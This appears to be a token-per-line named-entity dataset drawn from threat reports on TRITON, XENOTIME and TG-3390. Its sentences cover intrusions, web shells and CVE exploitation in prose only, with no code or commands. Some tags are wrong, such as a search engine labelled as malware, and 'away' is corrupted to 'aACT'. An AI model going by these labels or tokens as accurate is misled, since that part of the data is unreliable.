+TRITON B-ACT
+attack E-ACT
+where O
+malicious O
+actors O
+used O
+the O
+TRITON S-MAL
+custom O
+attack B-ACT
+framework E-ACT
+to O
+manipulate O
+industrial O
+safety O
+systems O
+at O
+a O
+critical O
+infrastructure O
+facility O
+and O
+inadvertently O
+caused O
+a O
+process O
+shutdown O
+. O
+
+In O
+our O
+most O
+recent O
+analysis O
+, O
+we O
+attributed O
+the O
+intrusion B-ACT
+activity E-ACT
+that O
+led O
+to O
+the O
+deployment O
+of O
+TRITON S-MAL
+to O
+a O
+Russian S-LOC
+government-owned O
+technical O
+research O
+institute O
+in O
+Moscow S-LOC
+. O
+
+For O
+more O
+in-depth O
+analysis O
+of O
+TRITON S-MAL
+and O
+other O
+cyber O
+threats O
+, O
+consider O
+subscribing O
+to O
+FireEye B-SECTEAM
+Cyber I-SECTEAM
+Threat I-SECTEAM
+Intelligence E-SECTEAM
+. O
+
+During O
+this O
+time O
+, O
+the O
+attacker O
+must O
+ensure O
+continued O
+access O
+to O
+the O
+target O
+environment O
+or O
+risk O
+losing O
+years O
+of O
+effort O
+and O
+potentially O
+expensive O
+custom O
+ICS S-MAL
+malware S-MAL
+. O
+
+In O
+this O
+report O
+we O
+continue O
+our O
+research O
+of O
+the O
+actor O
+'s O
+operations O
+with O
+a O
+specific O
+focus O
+on O
+a O
+selection O
+of O
+custom O
+information B-IDTY
+technology E-IDTY
+( O
+IT S-IDTY
+) O
+tools O
+and O
+tactics O
+the O
+threat O
+actor O
+leveraged O
+during O
+the O
+early O
+stages O
+of O
+the O
+targeted B-ACT
+attack E-ACT
+lifecycle O
+. O
+
+Additionally O
+, O
+the O
+actor O
+possibly O
+gained O
+a O
+foothold O
+on O
+other O
+target O
+networks—beyond O
+the O
+two O
+intrusions O
+discussed O
+in O
+this O
+post O
+– O
+using O
+similar O
+strategies O
+. O
+
+There O
+is O
+often O
+a O
+singular O
+focus O
+from O
+the O
+security B-SECTEAM
+community E-SECTEAM
+on O
+ICS S-MAL
+malware S-MAL
+largely O
+due O
+to O
+its O
+novel O
+nature O
+and O
+the O
+fact O
+that O
+there O
+are O
+very O
+few O
+examples O
+found O
+in O
+the O
+wild O
+. O
+
+In O
+this O
+blog O
+post O
+we O
+provide O
+additional O
+information O
+linking O
+TEMP.Veles S-APT
+and O
+their O
+activity O
+surrounding O
+the O
+TRITON S-MAL
+intrusion O
+to O
+a O
+Russian O
+government-owned O
+research O
+institute O
+. O
+
+Analysis O
+of O
+these O
+cryptcat O
+binaries O
+indicates O
+that O
+the O
+actor O
+continually O
+modified O
+them O
+to O
+decrease O
+AV O
+detection O
+rates O
+. O
+
+TEMP.Veles' S-APT
+lateral O
+movement B-ACT
+activities E-ACT
+used O
+a O
+publicly-available O
+PowerShell-based B-MAL
+tool E-MAL
+, O
+WMImplant S-MAL
+. O
+
+On O
+multiple O
+dates O
+in O
+2017 S-TIME
+, O
+TEMP.Veles S-APT
+struggled O
+to O
+execute O
+this O
+utility O
+on O
+multiple O
+victim O
+systems O
+, O
+potentially O
+due O
+to O
+AV O
+detection O
+. O
+
+Custom O
+payloads O
+utilized O
+by O
+TEMP.Veles S-APT
+in O
+investigations O
+conducted O
+by O
+Mandiant S-SECTEAM
+are O
+typically O
+weaponized O
+versions O
+of O
+legitimate O
+open-source O
+software O
+, O
+retrofitted B-ACT
+with I-ACT
+code E-ACT
+used O
+for O
+command O
+and O
+control O
+. O
+
+We O
+identified O
+file O
+creation O
+times O
+for O
+numerous O
+files O
+that O
+TEMP.Veles S-APT
+created O
+during O
+lateral O
+movement O
+on O
+a O
+target O
+'s O
+network O
+. O
+
+Adversary O
+behavioral O
+artifacts O
+further O
+suggest O
+the O
+TEMP.Veles S-APT
+operators O
+are O
+based O
+in O
+Moscow S-LOC
+, O
+lending O
+some O
+further O
+support O
+to O
+the O
+scenario O
+that O
+CNIIHM S-APT
+, O
+a O
+Russian S-LOC
+research B-IDTY
+organization E-IDTY
+in O
+Moscow S-LOC
+, O
+has O
+been O
+involved O
+in O
+TEMP.Veles B-APT
+activity E-ACT
+. O
+
+XENOTIME S-APT
+is O
+easily O
+the O
+most O
+dangerous O
+threat B-ACT
+activity E-ACT
+publicly O
+known O
+. O
+
+CNIIHM S-APT
+'s O
+characteristics O
+are O
+consistent O
+with O
+what O
+we O
+might O
+expect O
+of O
+an O
+organization O
+responsible O
+for O
+TEMP.Veles B-APT
+activity E-ACT
+. O
+
+Dragos S-SECTEAM
+identified O
+several O
+compromises O
+of O
+ICS B-MAL
+vendors I-MAL
+and I-MAL
+manufacturers E-MAL
+in O
+2018 S-TIME
+by O
+activity O
+associated O
+with O
+XENOTIME S-APT
+, O
+providing O
+potential O
+supply O
+chain O
+threat O
+opportunities O
+and O
+vendor-enabled O
+access O
+to O
+asset O
+owner O
+and O
+operator O
+ICS B-MAL
+networks E-MAL
+. O
+
+XENOTIME S-APT
+rose O
+to O
+prominence O
+in O
+December B-TIME
+2017 E-TIME
+when O
+Dragos S-SECTEAM
+and O
+FireEye S-SECTEAM
+jointly O
+published O
+details O
+of O
+TRISIS S-MAL
+destructive O
+malware O
+targeting O
+Schneider O
+Electric O
+'s O
+Triconex O
+safety O
+instrumented O
+system O
+. O
+
+Targeting O
+a O
+safety O
+system O
+indicates O
+significant O
+damage O
+and O
+loss O
+of O
+human O
+life O
+were O
+either O
+intentional O
+or O
+acceptable O
+goals O
+of O
+the O
+attack O
+, O
+a O
+consequence O
+not O
+seen O
+in O
+previous O
+disruptive O
+attacks O
+such O
+as O
+the O
+2016 S-TIME
+CRASHOVERRIDE S-MAL
+malware S-MAL
+that O
+caused O
+a O
+power O
+loss O
+in O
+Ukraine S-LOC
+. O
+
+XENOTIME S-APT
+used O
+credential B-MAL
+capture I-MAL
+and I-MAL
+replay E-MAL
+to O
+move O
+between O
+networks O
+, O
+Windows S-OS
+commands O
+, O
+standard O
+command-line O
+tools O
+such O
+as O
+PSExec S-MAL
+, O
+and O
+proprietary O
+tools O
+for O
+operations O
+on O
+victim O
+hosts O
+. O
+
+Dragos' S-SECTEAM
+data O
+indicates O
+XENOTIME S-APT
+remains O
+active O
+. O
+
+TEMP.Veles S-APT
+created O
+a O
+custom S-MAL
+malware S-MAL
+framework O
+and O
+tailormade B-MAL
+credential I-MAL
+gathering I-MAL
+tools E-MAL
+, O
+but O
+an O
+apparent O
+misconfiguration O
+prevented O
+the O
+attack O
+from O
+executing O
+properly O
+. O
+
+Furthermore O
+, O
+Dragos' S-SECTEAM
+analysis O
+of O
+the O
+TRISIS S-MAL
+event O
+continues O
+as O
+we O
+recover O
+additional O
+data O
+surrounding O
+the O
+incident O
+. O
+
+XENOTIME S-APT
+operates O
+globally O
+, O
+impacting O
+regions O
+far O
+outside O
+of O
+the O
+Middle B-LOC
+East E-LOC
+, O
+their O
+initial O
+target O
+. O
+
+Intelligence O
+suggests O
+the O
+group O
+has O
+been O
+active O
+since O
+at O
+least O
+2014 S-TIME
+and O
+is O
+presently O
+operating O
+in O
+multiple O
+facilities O
+targeting O
+safety O
+systems O
+beyond O
+Triconex O
+. O
+
+Dragos S-SECTEAM
+instead O
+focuses O
+on O
+threat O
+behaviors O
+and O
+appropriate O
+detection O
+and O
+response O
+. O
+
+Dragos S-SECTEAM
+assesses O
+with O
+moderate O
+confidence O
+that O
+XENOTIME S-APT
+intends O
+to O
+establish O
+required O
+access O
+and O
+capability O
+to O
+cause O
+a O
+potential O
+, O
+future O
+disruptive—or O
+even O
+destructive—event O
+. O
+
+However O
+, O
+full O
+details O
+on O
+XENOTIME S-APT
+and O
+other O
+group O
+tools O
+, O
+techniques O
+, O
+procedures O
+, O
+and O
+infrastructure O
+is O
+available O
+to O
+network O
+defenders O
+via O
+Dragos B-SECTEAM
+WorldView E-SECTEAM
+. O
+
+This O
+seems O
+confusing O
+as O
+FireEye S-SECTEAM
+earlier O
+publicly O
+declared O
+the O
+TRITON S-MAL
+as O
+a O
+discrete O
+entity O
+, O
+linked O
+to O
+a O
+Russian S-LOC
+research B-IDTY
+institution E-IDTY
+, O
+and O
+christened O
+it O
+as O
+" O
+TEMP.Veles S-APT
+" O
+. O
+
+This O
+seems O
+confusing O
+as O
+FireEye S-SECTEAM
+earlier O
+publicly O
+declared O
+the O
+" O
+TRITON S-MAL
+actor O
+" O
+as O
+a O
+discrete O
+entity O
+, O
+linked O
+to O
+a O
+Russian S-LOC
+research B-IDTY
+institution E-IDTY
+, O
+and O
+christened O
+it O
+as O
+" O
+TEMP.Veles S-APT
+" O
+. O
+
+Meanwhile O
+, O
+parallel O
+work O
+at O
+Dragos S-SECTEAM
+( O
+my O
+employer O
+, O
+where O
+I O
+have O
+performed O
+significant O
+work O
+on O
+the O
+activity O
+described O
+above O
+) O
+uncovered O
+similar O
+conclusions O
+concerning O
+TTPs O
+and O
+behaviors O
+, O
+for O
+both O
+the O
+2017 S-TIME
+event O
+and O
+subsequent O
+activity O
+in O
+other O
+industrial B-IDTY
+sectors E-IDTY
+. O
+
+FireEye S-SECTEAM
+recently O
+published O
+a O
+blog O
+covering O
+the O
+tactics O
+, O
+techniques O
+, O
+and O
+procedures O
+( O
+TTPs O
+) O
+for O
+the O
+" O
+TRITON S-MAL
+actor O
+" O
+when O
+preparing O
+to O
+deploy O
+the O
+TRITON/TRISIS S-MAL
+malware S-MAL
+framework O
+in O
+2017 S-TIME
+. O
+
+Based O
+on O
+information O
+gained O
+from O
+discussion O
+with O
+the O
+initial O
+TRITON/TRISIS S-MAL
+responders O
+and O
+subsequent O
+work O
+on O
+follow-on O
+activity O
+by O
+this O
+entity O
+, O
+Dragos S-SECTEAM
+developed O
+a O
+comprehensive O
+( O
+public O
+) O
+picture O
+of O
+adversary O
+activity O
+roughly O
+matching O
+FireEye S-SECTEAM
+'s O
+analysis O
+published O
+in O
+April B-TIME
+2019 E-TIME
+, O
+described O
+in O
+various O
+media S-IDTY
+. O
+
+Since O
+late O
+2018 S-TIME
+, O
+based O
+upon O
+the O
+most-recent O
+posting O
+, O
+FireEye S-SECTEAM
+appears O
+to O
+have O
+" O
+walked O
+back O
+" O
+the O
+previously-used O
+terminology O
+of O
+TEMP.Veles S-APT
+and O
+instead O
+refers O
+rather O
+cryptically O
+to O
+the O
+" O
+TRITON S-MAL
+actor O
+" O
+, O
+while O
+Dragos S-SECTEAM
+leveraged O
+identified O
+behaviors O
+to O
+consistently O
+refer O
+to O
+an O
+activity O
+group O
+, O
+XENOTIME S-APT
+. O
+
+Dragos S-SECTEAM
+leveraged O
+identified O
+behaviors O
+to O
+consistently O
+refer O
+to O
+an O
+activity O
+group O
+, O
+XENOTIME S-APT
+. O
+
+Aside O
+from O
+the O
+competitive O
+vendor O
+naming O
+landscape O
+( O
+which O
+I O
+am O
+not O
+a O
+fan O
+of O
+in O
+cases O
+on O
+direct O
+overlap O
+, O
+but O
+which O
+has O
+more O
+to O
+say O
+for O
+itself O
+when O
+different O
+methodologies O
+are O
+employed O
+around O
+similar O
+observations O
+) O
+, O
+the O
+distinction O
+between O
+FireEye S-SECTEAM
+and O
+Dragos' S-SECTEAM
+approaches O
+with O
+respect O
+to O
+the O
+" O
+TRITON S-MAL
+actor O
+" O
+comes O
+down O
+to O
+fundamental O
+philosophical O
+differences O
+in O
+methodology O
+. O
+
+In O
+the O
+2018 S-TIME
+public O
+posting O
+announcing O
+TEMP.Veles S-APT
+, O
+FireEye S-SECTEAM
+researchers O
+noted O
+that O
+the O
+institute O
+in O
+question O
+at O
+least O
+supported O
+TEMP.Veles B-APT
+activity E-ACT
+in O
+deploying O
+TRITON S-MAL
+. O
+
+My O
+understanding O
+is O
+FireEye S-SECTEAM
+labels O
+entities O
+where O
+definitive O
+attribution O
+is O
+not O
+yet O
+possible O
+with O
+the O
+" O
+TEMP S-APT
+" O
+moniker O
+( O
+hence O
+, O
+TEMP.Veles S-APT
+) O
+– O
+yet O
+in O
+this O
+case O
+FireEye S-SECTEAM
+developed O
+and O
+deployed O
+the O
+label O
+, O
+then O
+appeared O
+to O
+move O
+aACT O
+from O
+it O
+in O
+subsequent O
+reporting O
+. O
+
+In O
+comparison O
+, O
+XENOTIME S-APT
+was O
+defined O
+based O
+on O
+principles O
+of O
+infrastructure O
+( O
+compromised O
+third-party O
+infrastructure O
+and O
+various O
+networks O
+associated O
+with O
+several O
+Russian S-LOC
+research B-IDTY
+institutions E-IDTY
+) O
+, O
+capabilities O
+( O
+publicly- O
+and O
+commercially-available O
+tools O
+with O
+varying O
+levels O
+of O
+customization O
+) O
+and O
+targeting O
+( O
+an O
+issue O
+not O
+meant O
+for O
+discussion O
+in O
+this O
+blog O
+) O
+. O
+
+Of O
+note O
+, O
+this O
+methodology O
+of O
+naming O
+abstracts O
+aACT O
+the O
+" O
+who O
+" O
+element O
+– O
+XENOTIME S-APT
+may O
+represent O
+a O
+single O
+discrete O
+entity O
+( O
+such O
+as O
+a O
+Russian S-LOC
+research B-IDTY
+institution E-IDTY
+) O
+or O
+several O
+entities O
+working O
+in O
+coordination O
+in O
+a O
+roughly O
+repeatable O
+, O
+similar O
+manner O
+across O
+multiple O
+events O
+. O
+
+Much O
+like O
+the O
+observers O
+watching O
+the O
+shadows O
+of O
+objects O
+cast O
+upon O
+the O
+wall O
+of O
+the O
+cave O
+, O
+these O
+two O
+definitions O
+( O
+XENOTIME S-APT
+and O
+TEMP.Veles S-APT
+, O
+both O
+presumably O
+referring O
+to O
+" O
+the O
+TRITON S-APT
+actor O
+" O
+) O
+describe O
+the O
+same O
+phenomena O
+, O
+yet O
+at O
+the O
+same O
+time O
+appear O
+different O
+. O
+
+To O
+better O
+understand O
+how O
+the O
+adversary O
+was O
+operating O
+and O
+what O
+other O
+actions O
+they O
+had O
+performed O
+, O
+CTU S-SECTEAM
+researchers O
+examined O
+cmd.exe S-FILE
+and O
+its O
+supporting O
+processes O
+to O
+uncover O
+additional O
+command O
+line O
+artifacts O
+. O
+
+CTU S-SECTEAM
+researchers O
+assess O
+with O
+high O
+confidence O
+that O
+threat O
+groups O
+like O
+Threat B-APT
+Group-1314 E-APT
+will O
+continue O
+to O
+live O
+off O
+of O
+the O
+land O
+to O
+avoid O
+detection O
+and O
+conduct O
+their O
+operations O
+. O
+
+Analysis O
+of O
+TG-3390 S-APT
+'s O
+operations O
+, O
+targeting O
+, O
+and O
+tools O
+led O
+CTU S-SECTEAM
+researchers O
+to O
+assess O
+with O
+moderate O
+confidence O
+the O
+group O
+is O
+located O
+in O
+the O
+People's B-IDTY
+Republic E-IDTY
+of O
+China S-LOC
+. O
+
+The O
+threat O
+actors O
+target O
+a O
+wide O
+range O
+of O
+organizations O
+: O
+CTU S-SECTEAM
+researchers O
+have O
+observed O
+TG-3390 S-APT
+actors O
+obtaining O
+confidential O
+data O
+on O
+defense O
+manufacturing O
+projects O
+, O
+but O
+also O
+targeting O
+other O
+industry O
+verticals O
+and O
+attacking O
+organizations O
+involved O
+in O
+international O
+relations O
+. O
+
+In O
+comparison O
+to O
+other O
+threat O
+groups O
+, O
+TG-3390 S-APT
+is O
+notable O
+for O
+its O
+tendency O
+to O
+compromise O
+Microsoft S-IDTY
+Exchange O
+servers O
+using O
+a O
+custom B-MAL
+backdoor E-MAL
+and O
+credential B-MAL
+logger E-MAL
+. O
+
+CTU S-SECTEAM
+researchers O
+have O
+evidence O
+that O
+the O
+TG-3390 S-APT
+compromised O
+U.S. O
+and O
+UK O
+organizations O
+in O
+the O
+following O
+verticals O
+: O
+manufacturing S-IDTY
+( O
+specifically O
+aerospace S-IDTY
+( O
+including O
+defense B-IDTY
+contractors E-IDTY
+) O
+, O
+automotive S-IDTY
+, O
+technology S-IDTY
+, O
+energy S-IDTY
+, O
+and O
+pharmaceuticals S-IDTY
+) O
+, O
+education S-IDTY
+, O
+and O
+legal S-IDTY
+, O
+as O
+well O
+as O
+organizations O
+focused O
+on O
+international O
+relations O
+. O
+
+Based O
+on O
+analysis O
+of O
+the O
+group O
+'s O
+SWCs S-MAL
+, O
+TG-3390 S-APT
+operations O
+likely O
+affect O
+organizations O
+in O
+other O
+countries O
+and O
+verticals O
+. O
+
+TG-3390 S-APT
+operates O
+a O
+broad O
+and O
+long-running O
+campaign O
+of O
+SWCs S-ACT
+and O
+has O
+compromised O
+approximately O
+100 O
+websites O
+as O
+of O
+this O
+publication O
+. O
+
+CTU S-SECTEAM
+researchers O
+have O
+evidence O
+that O
+the O
+threat O
+group O
+compromised O
+U.S. O
+and O
+UK O
+organizations O
+in O
+the O
+following O
+verticals O
+: O
+manufacturing S-IDTY
+( O
+specifically O
+aerospace S-IDTY
+( O
+including O
+defense B-IDTY
+contractors E-IDTY
+) O
+, O
+automotive S-IDTY
+, O
+technology S-IDTY
+, O
+energy S-IDTY
+, O
+and O
+pharmaceuticals S-IDTY
+) O
+, O
+education S-IDTY
+, O
+and O
+legal S-IDTY
+, O
+as O
+well O
+as O
+organizations O
+focused O
+on O
+international O
+relations O
+. O
+
+Like O
+many O
+threat O
+groups O
+, O
+TG-3390 S-APT
+conducts O
+strategic B-ACT
+web I-ACT
+compromises E-ACT
+( O
+SWCs S-ACT
+) O
+, O
+also O
+known O
+as O
+watering B-ACT
+hole I-ACT
+attacks E-ACT
+, O
+on O
+websites O
+associated O
+with O
+the O
+target O
+organization O
+'s O
+vertical O
+or O
+demographic O
+to O
+increase O
+the O
+likelihood O
+of O
+finding O
+victims O
+with O
+relevant O
+information O
+. O
+
+Through O
+an O
+IP B-ACT
+address I-ACT
+whitelisting I-ACT
+process E-ACT
+, O
+the O
+threat O
+group O
+selectively O
+targets O
+visitors O
+to O
+these O
+websites O
+. O
+
+After O
+the O
+initial O
+compromise O
+, O
+TG-3390 S-APT
+delivers O
+the O
+HTTPBrowser B-MAL
+backdoor E-MAL
+to O
+its O
+victims O
+. O
+
+CTU S-SECTEAM
+researchers O
+assess O
+with O
+high O
+confidence O
+that O
+TG-3390 S-APT
+uses O
+information O
+gathered O
+from O
+prior O
+reconnaissance O
+activities S-ACT
+to O
+selectively O
+compromise O
+users O
+who O
+visit O
+websites O
+under O
+its O
+control O
+. O
+
+TG-3390 S-APT
+uses O
+the O
+PlugX B-MAL
+remote I-MAL
+access I-MAL
+tool E-MAL
+. O
+
+The O
+SWC S-ACT
+of O
+a O
+Uyghur O
+cultural O
+website O
+suggests O
+intent O
+to O
+target O
+the O
+Uyghur B-IDTY
+ethnic I-IDTY
+group E-IDTY
+, O
+a O
+Muslim B-IDTY
+minority I-IDTY
+group E-IDTY
+primarily O
+found O
+in O
+the O
+Xinjiang S-LOC
+region O
+of O
+China O
+. O
+
+The O
+threat O
+actors O
+have O
+used O
+the O
+Baidu B-MAL
+search I-MAL
+engine E-MAL
+, O
+which O
+is O
+only O
+available O
+in O
+Chinese S-LOC
+, O
+to O
+conduct O
+reconnaissance O
+activities S-ACT
+. O
+
+Recently O
+, O
+CTU S-SECTEAM
+researchers O
+responded O
+to O
+an O
+intrusion O
+perpetrated O
+by O
+Threat B-APT
+Group-1314 E-APT
+, O
+one O
+of O
+numerous O
+threat O
+groups O
+that O
+employ O
+the O
+" O
+living B-ACT
+off I-ACT
+the I-ACT
+land E-ACT
+" O
+technique O
+to O
+conduct O
+their O
+intrusions O
+. O
+
+CTU S-SECTEAM
+researchers O
+have O
+observed O
+the O
+Threat O
+Group-3390 S-APT
+obtaining O
+information O
+about O
+specific O
+U.S. B-IDTY
+defense E-IDTY
+projects O
+that O
+would O
+be O
+desirable O
+to O
+those O
+operating O
+within O
+a O
+country O
+with O
+a O
+manufacturing O
+base O
+, O
+an O
+interest O
+in O
+U.S. S-LOC
+military B-IDTY
+capability E-IDTY
+, O
+or O
+both O
+. O
+
+CTU S-SECTEAM
+researchers O
+have O
+observed O
+the O
+threat O
+group O
+obtaining O
+information O
+about O
+specific O
+U.S. B-IDTY
+defense E-IDTY
+projects O
+that O
+would O
+be O
+desirable O
+to O
+those O
+operating O
+within O
+a O
+country O
+with O
+a O
+manufacturing O
+base O
+, O
+an O
+interest O
+in O
+U.S. S-LOC
+military B-IDTY
+capability E-IDTY
+, O
+or O
+both O
+. O
+
+TG-3390 S-APT
+can O
+quickly O
+leverage O
+compromised O
+network B-ACT
+infrastructure E-ACT
+during O
+an O
+operation O
+and O
+can O
+conduct O
+simultaneous O
+intrusions O
+into O
+multiple O
+environments O
+. O
+
+Malware S-MAL
+used O
+by O
+the O
+threat O
+group O
+can O
+be O
+configured O
+to O
+bypass O
+network-based O
+detection O
+; O
+however O
+, O
+the O
+threat O
+actors O
+rarely O
+modify O
+host-based O
+configuration O
+settings O
+when O
+deploying O
+payloads O
+. O
+
+TG-3390 S-APT
+uses O
+older O
+exploits O
+to O
+compromise O
+targets O
+, O
+and O
+CTU S-SECTEAM
+researchers O
+have O
+not O
+observed O
+the O
+threat O
+actors O
+using O
+zero-day S-VULNAME
+exploits O
+as O
+of O
+this O
+publication O
+. O
+
+In O
+addition O
+to O
+using O
+SWCs S-MAL
+to O
+target O
+specific O
+types O
+of O
+organizations O
+, O
+TG-3390 S-APT
+uses O
+spearphishing B-ACT
+emails S-TOOL
+to O
+target O
+specific O
+victims O
+. O
+
+After O
+gaining O
+access O
+to O
+a O
+target O
+network O
+in O
+one O
+intrusion O
+analyzed O
+by O
+CTU S-SECTEAM
+researchers O
+, O
+TG-3390 S-APT
+actors O
+identified O
+and O
+exfiltrated O
+data O
+for O
+specific O
+projects O
+run O
+by O
+the O
+target O
+organization O
+, O
+indicating O
+that O
+they O
+successfully O
+obtained O
+the O
+information O
+they O
+sought O
+. O
+
+Based O
+on O
+this O
+information O
+, O
+CTU S-SECTEAM
+researchers O
+assess O
+that O
+TG-3390 S-APT
+aims O
+to O
+collect O
+defense O
+technology O
+and O
+capability O
+intelligence O
+, O
+other O
+industrial O
+intelligence O
+, O
+and O
+political B-IDTY
+intelligence E-IDTY
+from O
+governments S-IDTY
+and O
+NGOs E-IDTY
+. O
+
+Incident O
+response O
+engagements O
+have O
+given O
+CTU S-SECTEAM
+researchers O
+insight O
+into O
+the O
+tactics O
+TG-3390 S-APT
+employs O
+during O
+intrusions O
+. O
+
+CTU S-SECTEAM
+researchers O
+have O
+not O
+observed O
+TG-3390 S-APT
+actors O
+performing O
+reconnaissance O
+prior O
+to O
+compromising B-IDTY
+organizations E-IDTY
+. O
+
+CTU S-SECTEAM
+researchers O
+have O
+observed O
+the O
+threat O
+actors O
+installing O
+a O
+credential B-MAL
+logger E-MAL
+and O
+backdoor O
+on O
+Microsoft S-IDTY
+Exchange O
+servers O
+, O
+which O
+requires O
+a O
+technical O
+grasp O
+of O
+Internet B-TOOL
+Information I-TOOL
+Services E-TOOL
+( O
+IIS S-TOOL
+) O
+. O
+
+TG-3390 S-APT
+is O
+capable O
+of O
+using O
+a O
+C2 B-ACT
+infrastructure E-ACT
+that O
+spans O
+multiple O
+networks O
+and O
+registrars O
+. O
+
+TG-3390 S-APT
+SWCs O
+may O
+be O
+largely O
+geographically O
+independent O
+, O
+but O
+the O
+group O
+'s O
+most O
+frequently O
+used O
+C2 S-TOOL
+registrars O
+and O
+IP S-PROT
+net O
+blocks O
+are O
+located O
+in O
+the O
+U.S S-LOC
+. O
+
+Using O
+a O
+U.S. S-LOC
+based O
+C2 S-TOOL
+infrastructure O
+to O
+compromise O
+targets O
+in O
+the O
+U.S. S-LOC
+helps O
+TG-3390 S-APT
+actors O
+avoid O
+geo-blocking O
+and O
+geo-flagging O
+measures O
+used O
+in O
+network O
+defense O
+. O
+
+The O
+threat O
+actors O
+create O
+PlugX B-MAL
+DLL E-MAL
+stub O
+loaders O
+that O
+will O
+run O
+only O
+after O
+a O
+specific O
+date O
+. O
+
+The O
+compile O
+dates O
+of O
+the O
+samples O
+analyzed O
+by O
+CTU S-SECTEAM
+researchers O
+are O
+all O
+later O
+than O
+the O
+hard-coded O
+August B-TIME
+8 E-TIME
+, O
+2013 S-TIME
+date O
+, O
+indicating O
+that O
+the O
+code O
+might O
+be O
+reused O
+from O
+previous O
+tools O
+. O
+
+One O
+archive O
+sample O
+analyzed O
+by O
+CTU S-SECTEAM
+researchers O
+contained O
+a O
+legitimate O
+PDF B-MAL
+file E-MAL
+, O
+a O
+benign O
+image O
+of O
+interest O
+to O
+targets O
+( O
+see O
+Figure O
+8 O
+) O
+, O
+and O
+an O
+HTTPBrowser B-MAL
+installer E-MAL
+disguised O
+as O
+an O
+image O
+file O
+. O
+
+CTU S-SECTEAM
+researchers O
+have O
+observed O
+TG-3390 B-ACT
+activity E-ACT
+between O
+04:00 B-TIME
+and I-TIME
+09:00 E-TIME
+UTC O
+, O
+which O
+is O
+12:00 B-TIME
+to I-TIME
+17:00 E-TIME
+local O
+time O
+in O
+China S-LOC
+( O
+UTC O
++8 O
+) O
+. O
+
+TG-3390 S-APT
+sends O
+spearphishing B-ACT
+emails S-TOOL
+with O
+ZIP O
+archive O
+attachments O
+. O
+
+CTU S-SECTEAM
+researchers O
+have O
+observed O
+TG-3390 S-APT
+compromising O
+a O
+target O
+organization O
+'s O
+externally O
+and O
+internally O
+accessible O
+assets O
+, O
+such O
+as O
+an O
+OWA O
+server O
+, O
+and O
+adding B-ACT
+redirect I-ACT
+code E-ACT
+to O
+point O
+internal O
+users O
+to O
+an O
+external O
+website O
+that O
+hosts O
+an O
+exploit S-VULNAME
+and O
+delivers O
+malware O
+. O
+
+TG-3390 S-APT
+actors O
+have O
+used O
+Java S-TOOL
+exploits O
+in O
+their O
+SWCs S-MAL
+. O
+
+In O
+particular O
+, O
+TG-3390 S-APT
+has O
+exploited O
+CVE-2011-3544 S-VULID
+, O
+a O
+vulnerability O
+in O
+the O
+Java O
+Runtime O
+Environment O
+, O
+to O
+deliver O
+the O
+HTTPBrowser B-MAL
+backdoor E-MAL
+; O
+and O
+CVE-2010-0738 S-VULID
+, O
+a O
+vulnerability O
+in O
+JBoss S-MAL
+, O
+to O
+compromise O
+internally O
+and O
+externally O
+accessible O
+assets O
+used O
+to O
+redirect O
+users' O
+web O
+browsers O
+to O
+exploit S-VULNAME
+code O
+. O
+
+In O
+activity O
+analyzed O
+by O
+CTU S-SECTEAM
+researchers O
+, O
+TG-3390 S-APT
+executed O
+the O
+Hunter B-MAL
+web I-MAL
+application I-MAL
+scanning I-MAL
+tool E-MAL
+against O
+a O
+target O
+server O
+running O
+IIS S-TOOL
+. O
+
+In O
+particular O
+, O
+the O
+threat O
+actors O
+have O
+exploited O
+CVE-2011-3544 S-VULID
+, O
+a O
+vulnerability O
+in O
+the O
+Java O
+Runtime O
+Environment O
+, O
+to O
+deliver O
+the O
+HTTPBrowser B-MAL
+backdoor E-MAL
+; O
+and O
+CVE-2010-0738 S-VULID
+, O
+a O
+vulnerability O
+in O
+JBoss S-MAL
+, O
+to O
+compromise O
+internally O
+and O
+externally O
+accessible O
+assets O
+used O
+to O
+redirect O
+users' O
+web O
+browsers O
+to O
+exploit S-VULNAME
+code O
+. O
+
+TG-3390 S-APT
+uses O
+DLL B-ACT
+side I-ACT
+loading E-ACT
+, O
+a O
+technique O
+that O
+involves O
+running O
+a O
+legitimate O
+, O
+typically O
+digitally O
+signed O
+, O
+program O
+that O
+loads O
+a O
+malicious O
+DLL S-TOOL
+. O
+
+CTU S-SECTEAM
+researchers O
+have O
+observed O
+the O
+Threat B-APT
+Group-3390 E-APT
+employing O
+legitimate O
+Kaspersky S-SECTEAM
+antivirus O
+variants O
+in O
+analyzed O
+samples O
+. O
+
+The O
+adversaries O
+have O
+used O
+this O
+technique O
+to O
+allow O
+PlugX S-MAL
+and O
+HTTPBrowser S-MAL
+to O
+persist O
+on O
+a O
+system O
+. O
+
+CTU S-SECTEAM
+researchers O
+have O
+observed O
+the O
+TG-3390 S-APT
+employing O
+legitimate O
+Kaspersky S-SECTEAM
+antivirus O
+variants O
+in O
+analyzed O
+samples O
+. O
+
+TG-3390 S-APT
+actors O
+have O
+deployed O
+the O
+OwaAuth B-MAL
+web I-MAL
+shell E-MAL
+to O
+Exchange O
+servers O
+, O
+disguising O
+it O
+as O
+an O
+ISAPI O
+filter O
+. O
+
+In O
+other O
+cases O
+, O
+threat O
+actors O
+placed O
+web B-MAL
+shells E-MAL
+on O
+externally O
+accessible O
+servers O
+, O
+sometimes O
+behind O
+a O
+reverse O
+proxy O
+, O
+to O
+execute O
+commands O
+on O
+the O
+compromised O
+system O
+. O
+
+CTU S-SECTEAM
+researchers O
+have O
+discovered O
+numerous O
+details O
+about O
+TG-3390 S-APT
+operations O
+, O
+including O
+how O
+the O
+adversaries O
+explore O
+a O
+network O
+, O
+move O
+laterally O
+, O
+and O
+exfiltrate O
+data O
+. O
+
+When O
+the O
+adversaries' O
+operations O
+are O
+live O
+, O
+they O
+modify O
+the O
+record O
+again O
+to O
+point O
+the O
+C2 S-TOOL
+domain O
+to O
+an O
+IP S-PROT
+address O
+they O
+can O
+access O
+. O
+
+They O
+then O
+identify O
+the O
+Exchange O
+server O
+and O
+attempt O
+to O
+install O
+the O
+OwaAuth B-MAL
+web I-MAL
+shell E-MAL
+. O
+
+If O
+the O
+OwaAuth B-MAL
+web I-MAL
+shell E-MAL
+is O
+ineffective O
+because O
+the O
+victim O
+uses O
+two-factor O
+authentication O
+for O
+webmail O
+, O
+TG-3390 S-APT
+identify O
+other O
+externally O
+accessible O
+servers O
+and O
+deploy O
+ChinaChopper B-ACT
+web I-ACT
+shells E-ACT
+. O
+
+After O
+compromising O
+an O
+initial O
+victim O
+'s O
+system O
+( O
+patient O
+0 O
+) O
+, O
+the O
+threat O
+actors O
+use O
+the O
+Baidu B-MAL
+search I-MAL
+engine E-MAL
+to O
+search O
+for O
+the O
+victim O
+'s O
+organization O
+name O
+. O
+
+CTU S-SECTEAM
+researchers O
+discovered O
+the O
+threat O
+actors O
+searching O
+for O
+" O
